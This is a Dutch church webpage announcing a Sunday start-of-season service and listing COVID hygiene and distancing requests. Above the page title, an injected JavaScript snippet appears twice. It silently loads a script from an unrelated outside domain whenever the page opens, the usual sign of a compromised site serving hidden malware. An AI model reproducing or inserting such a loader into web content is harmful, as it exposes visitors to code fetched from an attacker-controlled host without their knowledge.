;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Komende zondag ... een vrolijke en hoopvolle startdienst! - PKN Damwâld

Komende zondag … een vrolijke en hoopvolle startdienst!

Gepubliceerd op: vrijdag 24 september 2021

Deze zondag morgen is er een hele vrolijke en hoopvolle startdienst. Met medewerking van ds. G. Timmer en de band Grutsk. Er is géén Bernetsjerke, maar wel een hele leuke activiteit voor alle kinderen! En… omdat de coronamaatregels zijn versoepeld per 25 september, is iedereen zonder meer welkom. Dus kom en vier deze mooie startdienst samen met ons mee. We hopen op een geslaagde start van het nieuwe winterseizoen!

We zijn dankbaar dat we u weer van harte kunnen uitnodigen om naar de kerk te komen. Het is belangrijk dat iedereen die naar de kerk komt, zich veilig voelt. Daarom zijn er een aantal zaken waar we met elkaar aan denken:

  • Iedereen ontsmet de handen bij binnenkomst
  • Houd gepaste afstand met het gemeentelid waar u naast gaat zitten
  • Houd gepaste afstand bij binnenkomst en vertrek
  • De collectes blijven bij de uitgang, er is geen collecte tijdens de dienst
  • Blijf thuis als u klachten heeft

We wensen u gezegende diensten toe!